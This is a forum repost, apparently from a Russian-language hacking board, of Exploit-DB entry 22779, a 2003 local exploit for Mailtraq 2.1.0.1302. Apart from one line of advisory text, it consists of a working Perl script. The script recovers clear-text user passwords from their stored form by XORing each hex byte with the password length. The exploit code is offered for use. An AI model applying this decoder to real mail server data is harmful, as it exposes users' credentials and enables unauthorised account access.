Exploit Mailtraq 2.1.0.1302 - User Password Encoding

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22779
Проверка EDB
  1. Пройдено
Автор
NOAM RATHAUS
Тип уязвимости
LOCAL
Платформа
WINDOWS
CVE
null
Дата публикации
2003-06-16
Код:
source: https://www.securityfocus.com/bid/7923/info

It has been reported that Mailtraq does not securely store passwords. Because of this, an attacker may have an increased chance at gaining access to clear text passwords. 

#!/usr/bin/perl 

$Password = $ARGV[0]; 

print "Passwords should be something like: \\3D66656463626160\n"; 
print "Provided password: $Password\n"; 

$Password = substr($Password, 3); 
$Length = length($Password)/2; 

print "Length: $Length\n"; 

for ($i = 0; $i < $Length; $i++) 
{ 
 print "Decoding: ", substr($Password, $i*2, 2), " = "; 
 $ord = hex(substr($Password, $i*2, 2)); 

 print $ord^$Length, " (", chr($ord^$Length), ")\n"; 
}
 
Источник
www.exploit-db.com

Похожие темы